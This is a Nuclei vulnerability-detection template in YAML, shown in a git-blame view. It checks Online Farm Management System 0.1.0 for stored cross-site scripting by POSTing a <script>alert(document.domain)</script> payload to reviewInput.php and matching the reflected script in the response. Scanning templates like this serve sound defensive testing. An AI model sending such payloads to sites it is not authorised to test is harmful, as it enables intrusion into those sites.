nuclei-templates/http/vulnerabilities/other/onlinefarm-management-xss.yaml

48 lines
1.1 KiB
YAML
Raw Normal View History

id: onlinefarm-management-xss
2022-07-20 16:44:07 +00:00
info:
2022-07-20 18:22:19 +00:00
name: Online Farm Management System 0.1.0 - Cross-Site Scripting
2022-07-20 16:44:07 +00:00
author: arafatansari
severity: high
2022-07-20 16:44:07 +00:00
description: |
Online Farm Management System 0.1.0 contains a cross-site scripting vulnerability via the review.php file.
2022-07-20 18:22:19 +00:00
reference:
- https://www.exploit-db.com/exploits/48673
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
2022-07-20 18:22:19 +00:00
metadata:
max-request: 1
2022-07-20 18:22:19 +00:00
verified: true
tags: onlinefarm,cms,xss,edb
2022-07-20 16:44:07 +00:00
http:
2022-07-20 16:44:07 +00:00
- raw:
- |
2022-07-20 18:22:19 +00:00
POST /reviewInput.php?pid=1 HTTP/1.1
2022-07-20 16:44:07 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-20 18:22:19 +00:00
comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0
2022-07-20 16:44:07 +00:00
host-redirects: true
2022-07-20 16:44:07 +00:00
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-20 18:22:19 +00:00
- '<em style="color: black;"><script>alert(document.domain)</script>'
2022-07-20 16:44:07 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/23